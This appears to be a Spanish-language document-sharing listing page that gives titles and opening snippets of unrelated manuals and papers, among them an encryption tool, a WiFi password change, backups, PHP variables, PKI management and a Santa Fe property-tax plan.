Qué es AT-Encrypt nos permitirá dotar de contraseña a cualquier documento o carpeta. Este documento o carpeta sólo será legible por aquel que conozca la contraseña El funcionamiento del cifrado (o encriptación)
Más detallesPLAN DE PAGO INMOBILIARIO EXPLICATIVO DEL SISTEMA ONLINE
Ministerio de Economía Secretaría de Finanzas Públicas Subsecretaría de Ingresos Públicos Administración Provincial de Impuestos Provincia de Santa Fe PLAN DE PAGO INMOBILIARIO EXPLICATIVO DEL SISTEMA
Más detallesMANUAL DE AYUDA TAREA PROGRAMADA COPIAS DE SEGURIDAD
MANUAL DE AYUDA TAREA PROGRAMADA COPIAS DE SEGURIDAD Fecha última revisión: Diciembre 2010 Tareas Programadas TAREAS PROGRAMADAS... 3 LAS TAREAS PROGRAMADAS EN GOTELGEST.NET... 4 A) DAR DE ALTA UN USUARIO...
Más detallesMANUAL CAMBIO DE CLAVE WIFI
MANUAL CAMBIO DE CLAVE WIFI En este manual se intenta explicar cómo cambiar la clave del router WIFI que los clientes tienen en su domicilio. Aprovechar para comentar a los clientes que si no disponen
Más detallesLa utilización de las diferentes aplicaciones o servicios de Internet se lleva a cabo respondiendo al llamado modelo cliente-servidor.
Procesamiento del lado del servidor La Programación del lado del servidor es una tecnología que consiste en el procesamiento de una petición de un usuario mediante la interpretación de un script en el
Más detallesPROPUESTA DE DESARROLLO DE SITIO WEB AVANZADO
Diseño Gráfico y Desarrollo Web PROPUESTA DE DESARROLLO DE SITIO WEB AVANZADO 2014 Tel: 66460338-55114997. 12 avenida 2-76 Z.13 Email: info@teknigt.com www.teknigt.com Contenido del paquete de sitio web
Más detallesMICQ. Trabajo Práctico Final Seminario de Ingeniería en Informática I 75.35. Facultad de Ingeniería, UBA. Junio 2002. Cátedra: Pablo Cosso
MICQ Facultad de Ingeniería, UBA. Junio 2002 Trabajo Práctico Final Seminario de Ingeniería en Informática I 75.35 Cátedra: Pablo Cosso Alumno: Diego Fernando Montaldo 75.300 1 de 1 Introducción Este documento
Más detallesDISPOSITIVO DE BANDA ANCHA
Como funciona un ISP Un ISP es un canalizador de información, puede canalizar la información desde Internet y hacia Internet, es decir brinda acceso a paginas de Internet y a el correo electrónico (utilizando
Más detallesAutores en Web of Science y ResearcherID
Autores en Web of Science y ResearcherID Biblioteca Universitaria Grupo de apoyo al aprendizaje y la investigación Web of Science y ResearcherID * Se pueden unificar los nombres de autor en Web of Science?
Más detallesManual del usuario USO DEL MERCADO
Manual del usuario USO DEL MERCADO Pagina El mercado...1 El área de trabajo...1 Colocación de sus productos...2 Encontrando ofertas y demandas...3 Haciendo y recibiendo propuestas...4 Aceptando una propuesta...5
Más detallesSistema Valefiel Todos los derechos reservados 2012
Sistema Valefiel Todos los derechos reservados 2012 Contenido 1. GENERALIDADES... 1 1.1 Que es VALEFIEL?... 1 1.2 Que es la tienda virtual?... 1 1.3 Configuración Técnica... 1 2. REGISTRO... 1 3. INGRESO/SALIDA
Más detallesTipos de variables, características generales y aspectos específicos de PHP de estos elementos básicos de la programación.
Tipos de variables, características generales y aspectos específicos de PHP de estos elementos básicos de la programación. En el manual de páginas dinámicas hemos introducido el concepto de variable. En
Más detallesEl sistema está solicitandome ingresar nuevamente porque mi sesión ha expirado. Qué significa esto?
Qué tipos de navegadores son compatibles? Necesito habilitar cookies? Qué son sesiones de cookies? El sistema está solicitandome ingresar nuevamente porque mi sesión ha expirado. Qué significa esto? Estoy
Más detallesACREDITACIÓN DE CARRERAS DE INGENIERÍA AGRONÓMICA PRIMERA FASE
ACREDITACIÓN DE CARRERAS DE INGENIERÍA AGRONÓMICA PRIMERA FASE Pautas de carga específicas para las carreras comprendidas en la Primera Fase del Proceso de Acreditación. Para realizar la carga del formulario
Más detallesSeguridad Informática
Universidad Rey Juan Carlos Grado en Ingeniería Informática Seguridad Informática Curso 2012/13 Prueba 3 - Seguridad en es Lea detenidamente las instrucciones del examen antes de comenzar: El examen consta
Más detallesBanco de la República Bogotá D. C., Colombia
Banco de la República Bogotá D. C., Colombia Subgerencia de Informática Departamento de Seguridad Informática MANUAL DE USUARIO PARA EL SERVICIO - SISTEMA DE GESTIÓN PKI DE USUARIOS ROAMING - USI-GI-56
Más detallesPráctica 6 - Página Web
Práctica 6 - Página Web Teoría. Una Página Web es un recurso de información que esta diseñada para la Word Wide Web (Red Mundial) y puede ser vista por medio un Navegador Web. Esta información se encuentra
Más detallesDepartamento CERES Área de Tarjetas Inteligentes Manual de Usuario
14 CORREO SEGURO. Hay aplicaciones de correo que permiten enviar y recibir correos cifrados y firmados digitalmente utilizando criptografía. Estas operaciones garantizan el intercambio seguro de información,
Más detallesCÓMO INSERTAR UN LIBRO ELECTRÓNICO DESDE UN PDF, DOC, PPT, FOTOS CREADO EN UNA WEB EXTERNA COMO SCRIBD EN UNA PÁGINA O SECCIÓN PARA VERLO ON-LINE
CÓMO INSERTAR UN LIBRO ELECTRÓNICO DESDE UN PDF, DOC, PPT, FOTOS CREADO EN UNA WEB EXTERNA COMO SCRIBD EN UNA PÁGINA O SECCIÓN PARA VERLO ON-LINE IMPORTANTE: Siempre que dependemos de una página externa
Más detallesPara entornos con más de un equipo conectados en red es necesario que el programa de firewall conceda paso a los servicios de Microsoft SQL Server.
ET-SEGURIDAD SQL INSTRUCCIONES DE USO IMPORTANTE Este software puede ser bloqueado por software antivirus. Asegúrese de añadir la excepción correspondiente si fuese necesario. Se recomienda deshabilitar
Más detallesPrograma diseñado y creado por 2014 - Art-Tronic Promotora Audiovisual, S.L.
Manual de Usuario Programa diseñado y creado por Contenido 1. Acceso al programa... 3 2. Opciones del programa... 3 3. Inicio... 4 4. Empresa... 4 4.2. Impuestos... 5 4.3. Series de facturación... 5 4.4.
Más detalles